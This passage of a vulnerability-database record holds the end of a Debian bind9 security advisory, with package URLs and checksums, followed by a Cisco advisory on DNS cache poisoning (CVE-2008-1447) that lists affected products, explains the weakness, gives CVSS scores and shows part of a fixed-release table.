http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache\r\nPoisoning Attacks\r\n\r\nAdvisory ID: cisco-sa-20080708-dns\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2008 July 08 1800 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nMultiple Cisco products are vulnerable to DNS cache poisoning attacks\r\ndue to their use of insufficiently randomized DNS transaction IDs and\r\nUDP source ports in the DNS queries that they produce, which may allow\r\nan attacker to more easily forge DNS answers that can poison DNS caches.\r\n\r\nTo exploit this vulnerability an attacker must be able to cause a\r\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\r\nservers that are only authoritative, or servers where recursion is not\r\nallowed, are not affected.\r\n\r\nCisco has released free software updates that address this vulnerability.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml.\r\n\r\nThis security advisory is being published simultaneously with\r\nannouncements from other affected organizations.\r\n\r\nAffected Products\r\n=================\r\n\r\nProducts that cache DNS responses and process DNS messages with the\r\nrecursion desired (RD) flag set may be vulnerable to a DNS cache\r\npoisoning attack depending on implementation of the DNS protocol.\r\nProducts that process DNS messages with the RD flag set will attempt to\r\nanswer the question asked on behalf of the client. A product is only\r\naffected if using a vulnerable implementation of the DNS protocol, the\r\nDNS server functionality for the product is enabled, and the DNS feature\r\nfor the product is configured to process recursive DNS query messages.\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following Cisco products are capable of acting as DNS servers and\r\nhave been found to have the DNS implementation weakness that makes some\r\ntypes of DNS cache poisoning attacks more likely to succeed:\r\n\r\n * Cisco IOS Software\r\n\r\n A device that is running Cisco IOS Software will be affected if it\r\n is running a vulnerable version and if it is acting as a DNS server.\r\n\r\n All Cisco IOS Software releases that support the DNS server\r\n functionality and that have not had their DNS implementation\r\n improved are affected. For information about specific fixed\r\n versions, please refer to the Software Versions and Fixes section.\r\n\r\n A device that is running Cisco IOS Software is configured to act\r\n as a DNS server if the command "ip dns server" is present in the\r\n configuration. This command is not enabled by default.\r\n\r\n * Cisco Network Registrar\r\n\r\n All Cisco Network Registrar versions are affected, and DNS services\r\n are enabled by default.\r\n\r\n The DNS server on CNR is enabled via the command-line interface\r\n (CLI) commands "server dns enable start-on-reboot" or "dns enable\r\n start-on-reboot" or via the web management interface in the Servers\r\n page by selecting the appropriate "Start," "Stop," or "Reload"\r\n button.\r\n\r\n * Cisco Application and Content Networking System\r\n\r\n All Cisco Application and Content Networking System (ACNS) versions\r\n are affected; DNS services are disabled by default.\r\n\r\n ACNS is configured to act as a DNS server if the command\r\n "dns enable" is present in the configuration.\r\n\r\n * Cisco Global Site Selector Used in Combination with Cisco Network\r\n Registrar\r\n\r\n The Cisco Global Site Selector (GSS) is affected when it is used in\r\n combination with Cisco Network Registrar software to provide a more\r\n complete DNS solution. Fixed software would come in the form of an\r\n update of the Cisco Network Registrar software rather than an update\r\n of the GSS software.\r\n\r\nProducts Confirmed Not Vulnerable\r\n+--------------------------------\r\n\r\nProducts that do not offer DNS server capabilities are not affected by\r\nthis vulnerability.\r\n\r\nThe Cisco GSS by itself is not affected by this vulnerability. However,\r\nit is affected when it is used with Cisco Network Registrar software.\r\n\r\nNo other Cisco products are currently known to be affected by these\r\nvulnerabilities.\r\n\r\nDetails\r\n=======\r\n\r\nThe Domain Name System is an integral part of networks that are based\r\non TCP/IP such as the Internet. Simply stated, the Domain Name System\r\nis a hierarchical database that contains mappings of hostnames and IP\r\naddresses. The DNS protocol is part of the TCP/IP protocol suite and\r\nallows DNS clients to query the DNS database to resolve hostnames to IP\r\naddresses.\r\n\r\nA DNS server is an application that implements the DNS protocol and that\r\nhas the ability to respond to queries made by DNS clients. When handling\r\na query from a DNS client, a DNS server can look into its portion of the\r\nglobal DNS database (if the query is for a portion of the DNS database\r\nfor which the DNS server is authoritative), or it can relay the query\r\nto other DNS servers (if it is configured to do so and if the query\r\nis for a portion of the DNS database for which the DNS server is not\r\nauthoritative.)\r\n\r\nBecause of the processing time and bandwidth that is associated with\r\nhandling a DNS query, most DNS servers locally store responses that\r\nare received from other DNS servers. The area where these responses\r\nare stored locally is called a "cache." Once a response is stored in a\r\ncache, the DNS server can use the locally stored response for a certain\r\ntime (called the "time to live") before having to query DNS servers\r\nagain to refresh the local (cached) copy of the response.\r\n\r\nA DNS cache poisoning attack is an attack in which an entry in the\r\nDNS cache of a DNS server is changed so the IP address associated\r\nwith a hostname in the cache does not point to the correct place. For\r\nexample, if www.example.com is mapped to the IP address 192.168.0.1\r\nand this mapping is present in the cache of a DNS server, an attacker\r\nwho succeeds in poisoning the DNS cache of this server may be able to\r\nmap www.example.com to 10.0.0.1 instead. If this happens, a user who\r\nis trying to visit www.example.com may end up contacting the wrong web\r\nserver.\r\n\r\nAlthough DNS cache poisoning attacks are not new, a security researcher\r\nrecently presented a technique that allows an attacker to mount\r\nsuccessful DNS cache poisoning attacks with low complexity tools and\r\nlow traffic requirements. This technique exploits a weakness in most\r\nimplementations of the DNS protocol. The fundamental implementation\r\nweakness is that the DNS transaction ID and source port number used to\r\nvalidate DNS responses are not sufficiently randomized and can easily\r\nbe predicted, which allows an attacker to create forged responses to\r\nDNS queries that will match the expected values. The DNS server will\r\nconsider such responses to be valid.\r\n\r\nThe following Cisco products that offer DNS server functionality have\r\nbeen found to be susceptible to DNS cache poisoning attacks:\r\n\r\n * Cisco IOS Software: The vulnerability documented in Cisco bug ID\r\n CSCso81854.\r\n\r\n * Cisco Network Registrar: The vulnerability documented in Cisco\r\n bug ID CSCsq01298.\r\n\r\n * Cisco Application and Content Networking System (ACNS): The\r\n vulnerability documented in Cisco bug ID CSCsq21930.\r\n\r\nThis vulnerability has been assigned Common Vulnerabilities and\r\nExposures (CVE) ID CVE-2008-1447.\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerabilities in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\nCisco Bugs:\r\n\r\n* DNS cache prone to poisoning/forged answers attacks (CSCsq21930)\r\n\r\n* DNS susceptible to forged query response attacks (CSCsq01298)\r\n\r\n* Need to make DNS implementation more resilient against forged answers\r\n(CSCso81854)\r\n\r\nCVSS Base Score - 6.4\r\n Access Vector - Network\r\n Access Complexity - Low\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - Partial\r\n\r\nCVSS Temporal Score - 5.3\r\n Exploitability - Functional\r\n Remediation Level - Official-Fix\r\n Report Confidence - Confirmed\r\n\r\n(same score for the three Cisco bugs listed above.)\r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of the vulnerability described in this document\r\nmay result in invalid hostname-to-IP address mappings in the cache of an\r\naffected DNS server. This may lead users of this DNS server to contact\r\nthe wrong provider of network services. The ultimate impact varies\r\ngreatly, ranging from a simple denial of service (for example, making\r\nwww.example.com resolve to 127.0.0.1) to phishing and financial fraud.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nWhen considering software upgrades, also consult\r\nhttp://www.cisco.com/go/psirt and any subsequent advisories to determine\r\nexposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should exercise caution to be certain the\r\ndevices to be upgraded contain sufficient memory and that current\r\nhardware and software configurations will continue to be supported\r\nproperly by the new release. If the information is not clear, contact\r\nthe Cisco Technical Assistance Center (TAC) or your contracted\r\nmaintenance provider for assistance.\r\n\r\nCisco IOS Software\r\n+-----------------\r\n\r\nEach row of the Cisco IOS Software table (below) names a Cisco IOS\r\nSoftware release train. If a given release train is vulnerable, then\r\nthe earliest possible releases that contain the fix (along with the\r\nanticipated date of availability for each, if applicable) are listed in\r\nthe "First Fixed Release" column of the table. The "Recommended Release"\r\ncolumn indicates the releases which have fixes for all the published\r\nvulnerabilities at the time of this Advisory. A device running a release\r\nin the given train that is earlier than the release in a specific column\r\n(less than the First Fixed Release) is known to be vulnerable. Cisco\r\nrecommends upgrading to a release equal to or later than the release in\r\nthe "Recommended Releases" column of the table.\r\n\r\n+----------------------------------------+\r\n| Major | Availability of |\r\n| Release | Repaired Releases |\r\n|------------+---------------------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.0-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| 12.0 | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)DB | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0DB | release | |\r\n| | 12.0(7)DB | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)DC | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0DC | release | |\r\n| | 12.0(7)DC | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0S | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0ST | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.0T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.0W | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0WC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.0WT | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XE1 | |\r\n| | are | |\r\n| 12.0XE | vulnerable, | |\r\n| | release | |\r\n| | 12.0(7)XE1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.0XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XK2 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0XK | release | |\r\n| | 12.0(7)XK2 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0XL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XN | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XR1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0XR | release | |\r\n| | 12.0(7)XR1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0XS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.1-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.1 | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.1AA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1AX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(22)AY1 | |\r\n| | are | |\r\n| 12.1AY | vulnerable, | 12.1(22) |\r\n| | release | EA11 |\r\n| | 12.1(22)AY1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1AZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1CX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(4)DB1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1DB | release | |\r\n| | 12.1(4)DB1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(4)DC2 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1DC | release | |\r\n| | 12.1(4)DC2 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.1E | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(11)EA1 | |\r\n| | are | |\r\n| 12.1EA | vulnerable, | 12.1(22) |\r\n| | release | EA11 |\r\n| | 12.1(11)EA1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1EB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(8a)EX | |\r\n| | are | |\r\n| 12.1EX | vulnerable, | |\r\n| | release | |\r\n| | 12.1(8a)EX | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1EY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1GA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1GB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.1T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.1XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(1)XC1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1XC | release | |\r\n| | 12.1(1)XC1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.1XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XN | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XT | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XY | Not | |\r\n| | Vulnerable | 